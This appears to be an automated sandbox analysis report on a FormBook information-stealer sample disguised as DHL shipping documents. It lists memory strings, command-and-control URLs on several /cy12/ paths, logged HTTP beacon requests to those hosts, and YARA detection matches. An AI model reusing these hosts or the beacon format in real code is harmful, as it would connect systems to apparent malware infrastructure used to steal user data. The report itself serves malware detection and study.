Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pmugly.topReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.routinelywell.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.routinelywell.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.routinelywell.com/cy12/&&&&&&&&
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.routinelywell.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssongg3132.cfd
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssongg3132.cfd/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssongg3132.cfd/cy12/www.hamidconstruction.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ssongg3132.cfdReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedivorcelawyer.website
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedivorcelawyer.website/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedivorcelawyer.website/cy12/www.routinelywell.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thedivorcelawyer.websiteReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ungravity.dev
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ungravity.dev/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ungravity.dev/cy12/www.pmugly.top
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ungravity.devReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.withscreamandsugar.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.withscreamandsugar.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.withscreamandsugar.com/cy12/www.thedivorcelawyer.website
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.withscreamandsugar.comReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcolpuj.xyz
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcolpuj.xyz/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcolpuj.xyz/cy12/www.xv1lz.cfd
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcolpuj.xyzReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xv1lz.cfd
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xv1lz.cfd/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xv1lz.cfd/cy12/www.ungravity.dev
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xv1lz.cfdReferer:
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yourdesignneed.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yourdesignneed.com/cy12/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yourdesignneed.com/cy12/www.withscreamandsugar.com
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yourdesignneed.comReferer:
Source: explorer.exe, 00000003.00000002.3449753491.00000000093C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.998701663.00000000093C3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.997585045.00000000070C9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000000.998701663.0000000009242000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.0000000009242000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000000.998701663.00000000093F5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.3463568435.0000000010BFF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3442486038.0000000005B7F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?23e52f8a2f34650f474cdd7da74abfc8
Source: explorer.exe, 00000003.00000002.3463568435.0000000010BFF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3442486038.0000000005B7F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://iu1.nj8qob.com:88/34/
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.3456744916.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3210872481.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3179573573.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2776327418.000000000BB08000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000000.998701663.000000000942F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3441971454.0000000004C48000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.995226314.0000000004C4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.995226314.0000000004C48000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777499956.0000000009447000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3449753491.00000000093F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3441971454.0000000004C4C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: www.modestswimwearshop.com

Source: C:\Windows\explorer.exe

Code function: 3_2_0E8FEF82 getaddrinfo,setsockopt,recv,

3_2_0E8FEF82

Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.modestswimwearshop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.com-safe.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.elfiensclinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=3ygVfBIa0HGiFlfKyaMrueuajYyskdaeFhTv94TMZpq88FBTarjLVZY/KKLUVTjfM/60&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.ssongg3132.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=7lHQpdK6TkflL8F8jBh9ujCCw+Z4C/llZEJLsHo9QOc6XtJTCIRu+iorXSY5XXoPERW4&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.xv1lz.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=iyef6EjVDd/dvjgrsxJwH1FkI7yMzM3jQxJ7rAziOaY8j1mxZQA+oVnGNKxpGmfMvyVL&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.ungravity.devConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.pmugly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20 HTTP/1.1Host: www.pmugly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3441334701.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3441040603.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3461422392.000000000E916000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1038021088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.993591273.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: DHL_Shipping_Documents.exe PID: 4496, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: DHL_Shipping_Documents.exe PID: 1360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 2504, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: DHL_Shipping_Documents.exe

Source: DHL_Shipping_Documents.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.DHL_Shipping_Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
